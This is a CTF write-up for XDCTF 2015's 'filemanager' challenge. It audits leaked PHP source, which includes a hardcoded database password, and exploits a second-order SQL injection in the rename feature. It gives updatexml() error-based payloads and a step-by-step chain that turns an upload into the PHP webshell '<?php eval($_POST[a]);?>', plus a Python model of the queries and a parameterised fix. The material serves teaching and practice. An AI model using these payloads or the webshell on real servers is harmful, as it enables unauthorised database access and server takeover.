[XDCTF 2015]filemanager


Last updated 3 years ago


Key points

  • Code audit

  • Second-order (stored) SQL injection

Writeup

The application has three functions: file upload, file deletion and file renaming.

Clicking delete on a file straight away produces a SQL error, so the file name is a likely injection point.

A directory scan turns up www.tar.gz, the leaked source.

common.inc.php does the initial setup: it connects to the xdctf database, copies every string value from $_GET, $_POST and $_COOKIE into $req after running it through addslashes() (the other scripts only ever read $req, never the raw superglobals), defines the upload path upload/ and defines redirect().

common.inc.php
<?php
$DATABASE = array(
	"host" => "127.0.0.1",
	"username" => "root",
	"password" => "ayshbdfuybwayfgby",
	"dbname" => "xdctf",
);
$db = new mysqli($DATABASE['host'], $DATABASE['username'], $DATABASE['password'], $DATABASE['dbname']);
// Every string parameter is escaped once, on the way in. Values read back
// from the database later are NOT escaped again; that is what rename.php abuses.
$req = array();
foreach (array($_GET, $_POST, $_COOKIE) as $global_var) {
	foreach ($global_var as $key => $value) {
		is_string($value) && $req[$key] = addslashes($value);
	}
}
define("UPLOAD_DIR", "upload/");
function redirect($location) {
	header("Location: {$location}");
	exit;
}

upload.php reads the uploaded file. basename() strips any directory part from the client-supplied name, then pathinfo() splits it into the dirname, basename, extension and filename entries of $path_parts. The extension must be one of ["gif", "jpg", "png", "zip", "txt"]. The name is rebuilt as filename + "." + extension, and $path_parts["filename"] is passed through addslashes() before it is used in SQL. A SELECT on filename and extension checks that the file does not already exist, and after move_uploaded_file() an INSERT records filename and extension in the file table of the xdctf database. Two details matter later: the stored extension carries its leading dot (".txt"), and addslashes() only protects this one INSERT. MySQL strips the backslash when it parses the literal, so the row that ends up in the table holds the raw file name, quotes and all.

upload.php
<?php
require_once "common.inc.php";
if ($_FILES) {
	$file = $_FILES["upfile"];
	if ($file["error"] == UPLOAD_ERR_OK) {
		$name = basename($file["name"]);
		$path_parts = pathinfo($name);
		if (!in_array($path_parts["extension"], array("gif", "jpg", "png", "zip", "txt"))) {
			exit("error extension");
		}
		$path_parts["extension"] = "." . $path_parts["extension"];
		$name = $path_parts["filename"] . $path_parts["extension"];
		// escaped for these two statements only; the value stored in the table is the raw filename
		$path_parts['filename'] = addslashes($path_parts['filename']);
		$sql = "select * from `file` where `filename`='{$path_parts['filename']}' and `extension`='{$path_parts['extension']}'";
		$fetch = $db->query($sql);
		if ($fetch->num_rows > 0) { exit("file is exists"); }
		if (move_uploaded_file($file["tmp_name"], UPLOAD_DIR . $name)) {
			$sql = "insert into `file` ( `filename`, `view`, `extension`) values( '{$path_parts['filename']}', 0, '{$path_parts['extension']}')";
			$re = $db->query($sql);
			if (!$re) { print_r($db->error); exit; }
			$url = "/" . UPLOAD_DIR . $name;
			echo "Your file is upload, url:
				<a href=\"{$url}\" target='_blank'>{$url}</a><br/>
				<a href=\"/\">go back</a>";
		} else { exit("upload error"); }
	} else { print_r(error_get_last()); exit; }
}

delete.php first looks the filename up, then removes the database row with a DELETE statement and finally deletes the file with unlink().

delete.php
<?php
require_once "common.inc.php";
if(isset($req['filename'])) {
    $result = $db->query("select * from `file` where `filename`='{$req['filename']}'");
    if ($result->num_rows>0){
        $result = $result->fetch_assoc();
    }
    $filename = UPLOAD_DIR . $result["filename"] . $result["extension"];
    if ($result && file_exists($filename)) {
        $db->query('delete from `file` where `fid`=' . $result["fid"]);
        unlink($filename);
        redirect("/");
    }
}
?>

rename.php first looks oldname up, then updates the row with an UPDATE statement, printing the MySQL error if the UPDATE fails (this is the error-based channel used below), and finally renames the file on disk with rename().

rename.php
<?php
require_once "common.inc.php";
if (isset($req['oldname']) && isset($req['newname'])) {
	// $req['oldname'] was escaped by common.inc.php: this SELECT is safe
	$result = $db->query("select * from `file` where `filename`='{$req['oldname']}'");
	if ($result->num_rows > 0) {
		$result = $result->fetch_assoc();
	} else { exit("old file doesn't exists!"); }
	if ($result) {
		$req['newname'] = basename($req['newname']);
		// $result['filename'] comes straight from the database, unescaped: second-order injection
		$re = $db->query("update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}");
		if (!$re) { print_r($db->error); exit; }   // the MySQL error text is echoed to the page
		// the stored extension is appended to BOTH paths
		$oldname = UPLOAD_DIR . $result["filename"] . $result["extension"];
		$newname = UPLOAD_DIR . $req["newname"] . $result["extension"];
		if (file_exists($oldname)) { rename($oldname, $newname); }
		$url = "/" . $newname;
		echo "Your file is rename, url:
			<a href=\"{$url}\" target='_blank'>{$url}</a><br/>
			<a href=\"/\">go back</a>";
	}
}
?>

Upload a file named aaa'.txt. The statement executed is insert into `file` ( `filename`, `view`, `extension`) values( 'aaa\'', 0, '.txt'), and the row stored is filename aaa' with extension .txt.

When the rename page checks that the file exists it executes select * from `file` where `filename`='aaa\'' ($req['oldname'] was escaped by common.inc.php), which matches the row.

The UPDATE, however, splices the stored filename in unescaped: update `file` set `filename`='bbbb', `oldname`='aaa'' where `fid`=5. MySQL treats '' inside a quoted string as an escaped quote, so the literal never terminates and the page prints the error near ''aaa'' where `fid`=5' at line 1. The error also leaks the fid of the row being renamed, which tells us which fid the next upload will receive.

Confirming the injection

From the error message we know the current file's fid is 6 (the numbers here are the ones from the writeup; yours depend on how many rows already exist). Upload dddd.txt, which gets fid 7, then upload a file named dddd' where fid=7#.txt, which gets fid 8.

On the rename page set oldname to dddd'%20where%20fid=7# and newname to ddddx. If the value goes in the query string, URL-encode it fully (the # must become %23, otherwise the browser treats it as a fragment and never sends it).

rename.php first runs select * from `file` where `filename`='dddd\' where fid=7#', which matches the fid 8 row.

It then runs update `file` set `filename`='ddddx', `oldname`='dddd' where fid=7#' where `fid`=8: the # comments out the real WHERE clause, so the UPDATE hits fid 7 instead of fid 8.

The file name of the eighth upload has thus renamed the dddd record (fid 7) to ddddx in the database. On disk, rename() still acts on the matched row: upload/dddd' where fid=7#.txt becomes upload/ddddx.txt.

Injection steps

  1. Upload f.txt; say it gets fid 15.

  2. Upload a file named f' where fid=15 and updatexml(1,concat(0x3a,(select(group_concat(schema_name))from(information_schema.schemata))),1)#.txt. The fid in the payload must belong to an existing row (here the one from step 1); if no row matches, MySQL never evaluates the updatexml() call and no error is raised.

  3. On the rename page set oldname to f'%20where%20fid=15%20and%20updatexml(1,concat(0x3a,(select(group_concat(schema_name))from(information_schema.schemata))),1)# and newname to anything. The UPDATE fails and the page prints the XPath error containing the database list: information_schema,mysql,perfor. updatexml() truncates the error text to 32 characters, so wrap the subquery in reverse() to read the tail; the two halves together give the full list: information_schema,mysql,performance_schema,test,xdctf.

Exploitation

The flag is not in the database, so the injection is used to change a file's extension and get a shell.

We need rename.php to call rename('upload/shell.txt', 'upload/shell.php'), i.e. these two lines must evaluate to upload/shell.txt and upload/shell.php:

$oldname = UPLOAD_DIR . $result["filename"] . $result["extension"];
$newname = UPLOAD_DIR . $req["newname"] . $result["extension"];

Since the stored extension is appended to both paths, the row's extension must be empty and its filename must carry the extension instead (shell.txt).

The statement we need the rename page to execute is therefore update `file` set `filename`='shell.php', `oldname`='shell.txt',extension='' where fid=1#' where `fid`=2, where everything after the # is the script's own WHERE clause, now commented out.

  1. Upload shell.txt containing the one-liner <?php eval($_POST[a]);?>; on a fresh table it gets fid 1 (otherwise read the fid from the error message as above and adjust the payload).

  2. Upload a file named shell.txt',extension='' where fid=1#.txt.

  3. Rename shell.txt',extension=''%20where%20fid=1# to shell.php.

  4. Rename shell.php to shell.php.txt.

  5. Rename shell.php.txt to shell.php.

After uploading shell.txt the table looks like this:

fid | filename | oldname | view | extension
1   | shell    |         | 0    | .txt

After uploading shell.txt',extension='' where fid=1#.txt:

fid | filename                             | oldname | view | extension
1   | shell                                |         | 0    | .txt
2   | shell.txt',extension='' where fid=1# |         | 0    | .txt

At this point the upload directory holds two files, shell.txt and shell.txt',extension='' where fid=1#.txt.

Rename shell.txt',extension=''%20where%20fid=1# to shell.php.

The SELECT matches the fid 2 row, whose stored filename is shell.txt',extension='' where fid=1# and whose extension is .txt.

The UPDATE then runs as update `file` set `filename`='shell.php', `oldname`='shell.txt',extension='' where fid=1#' where `fid`=2, which modifies fid 1, not fid 2.

rename() then moves the matched row's file, shell.txt',extension='' where fid=1#.txt, to newname + extension, i.e. shell.php.txt. The upload directory now holds shell.php.txt and shell.txt.

fid | filename                             | oldname   | view | extension
1   | shell.php                            | shell.txt | 0    |
2   | shell.txt',extension='' where fid=1# |           | 0    | .txt

Rename again with oldname=shell.php&newname=shell.php.txt. This UPDATE is an ordinary one on fid 1 (filename becomes shell.php.txt, oldname shell.php). Because fid 1's extension is now empty, rename.php computes $oldname as upload/shell.php, which does not exist on disk, so rename() is skipped and the directory still holds shell.php.txt and shell.txt. The only purpose of this step is to make the database filename match the file that actually exists on disk.

fid | filename                             | oldname   | view | extension
1   | shell.php.txt                        | shell.php | 0    |
2   | shell.txt',extension='' where fid=1# |           | 0    | .txt

Rename once more with oldname=shell.php.txt&newname=shell.php. Now $oldname is upload/shell.php.txt, which exists, and $newname is upload/shell.php (the empty extension adds nothing), so rename() turns shell.php.txt into shell.php and the webshell is reachable at /upload/shell.php.
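To make the query construction concrete, here is an added example (not part of the writeup or of the challenge source) that re-implements in Python only the string handling of common.inc.php, upload.php and rename.php shown above, so the SQL produced in the confirmation section and in the getshell chain can be inspected without a MySQL instance. The stored-value rule (MySQL strips the addslashes() backslash when it parses the literal) is modelled rather than executed, fids are assigned by hand, and safe_rename_demo() at the end is an assumed parameterised fix built on sqlite3, not the challenge's code.

```python
"""Query-construction model for the filemanager challenge (added example, not the
challenge's own code). Only the string handling of common.inc.php, upload.php and
rename.php is reproduced; MySQL itself is not run. Assumptions: fids are assigned by
hand, and safe_rename_demo() is an assumed parameterised fix, not the original."""
import sqlite3

ALLOWED_EXT = {"gif", "jpg", "png", "zip", "txt"}


def addslashes(s: str) -> str:
    """PHP addslashes(): backslash-escape single quote, double quote, backslash and NUL."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def pathinfo(name: str):
    """The subset of PHP pathinfo() used here: split on the last dot into (filename, extension)."""
    stem, dot, ext = name.rpartition(".")
    return (stem, ext) if dot else (name, "")


def upload_queries(uploaded_name: str, fid: int):
    """SQL built by upload.php for a multipart file name; returns (insert_sql, stored_row).
    addslashes() protects this one INSERT, but MySQL strips the backslash when it parses
    the literal, so the row that lands in the table holds the *raw* stem, quote included."""
    stem, ext = pathinfo(uploaded_name)
    if ext not in ALLOWED_EXT:
        raise ValueError("error extension")
    ext = "." + ext                                   # stored with its leading dot
    insert = ("insert into `file` ( `filename`, `view`, `extension`) "
              f"values( '{addslashes(stem)}', 0, '{ext}')")
    return insert, {"fid": fid, "filename": stem, "extension": ext}


def rename_queries(row: dict, oldname_req: str, newname_req: str):
    """SQL built by rename.php; `row` is the record its SELECT matched.
    The SELECT uses the addslashes()'d request value and is safe; the UPDATE splices
    row['filename'] straight from the database, which is the second-order injection."""
    select = f"select * from `file` where `filename`='{addslashes(oldname_req)}'"
    newname = newname_req.rsplit("/", 1)[-1]          # basename(), simplified
    update = (f"update `file` set `filename`='{newname}', "
              f"`oldname`='{row['filename']}' where `fid`={row['fid']}")
    return select, update


def rename_paths(row: dict, newname: str):
    """The two paths rename.php hands to rename(): both get row['extension'] appended,
    which is why the exploit has to blank the extension column first."""
    return (f"upload/{row['filename']}{row['extension']}",
            f"upload/{newname}{row['extension']}")


def leak_update(existing_fid: int) -> str:
    """UPDATE produced by the updatexml() confirmation payload. It only errors (and leaks)
    when `existing_fid` is a real row, because MySQL short-circuits the AND otherwise."""
    stem = (f"f' where fid={existing_fid} and updatexml(1,concat(0x3a,(select(group_concat"
            "(schema_name))from(information_schema.schemata))),1)#")
    _, row = upload_queries(stem + ".txt", existing_fid + 1)
    return rename_queries(row, row["filename"], "x")[1]


def getshell_chain():
    """Trace the writeup's chain: returns (select, update) for the rename of the injected
    row, plus the paths of the final rename once fid 1 reads shell.php.txt with no extension."""
    _, row1 = upload_queries("shell.txt", 1)
    _, row2 = upload_queries("shell.txt',extension='' where fid=1#.txt", 2)
    select, update = rename_queries(row2, row2["filename"], "shell.php")
    # effect of `update` on row 1, applied by hand: filename=shell.php, extension=''
    row1.update(filename="shell.php", extension="")
    row1["filename"] = "shell.php.txt"                # after the ordinary rename in step 4
    final_paths = rename_paths(row1, "shell.php")
    return select, update, final_paths


def safe_rename_demo() -> str:
    """Assumed fix (not the challenge's code): parameterised queries keep the stored quote
    as data. Returns fid 1's extension after renaming the injected row; it stays '.txt'."""
    db = sqlite3.connect(":memory:")
    db.execute('create table file(fid integer primary key, filename, oldname, "view", extension)')
    bad = "shell.txt',extension='' where fid=1#"
    db.executemany('insert into file(filename, "view", extension) values(?, 0, ?)',
                   [("shell", ".txt"), (bad, ".txt")])
    fid, stored = db.execute("select fid, filename from file where filename=?", (bad,)).fetchone()
    db.execute("update file set filename=?, oldname=? where fid=?", ("shell.php", stored, fid))
    return db.execute("select extension from file where fid=1").fetchone()[0]


if __name__ == "__main__":
    for q in getshell_chain()[:2]:
        print(q)
    print(leak_update(15))
```

Running the block prints the SELECT and UPDATE that step 3 of the chain triggers; the `#` in the UPDATE is exactly where the script's own `where `fid`=2` is cut off, and rename_paths() shows why step 4 is needed before the final rename lands on upload/shell.php.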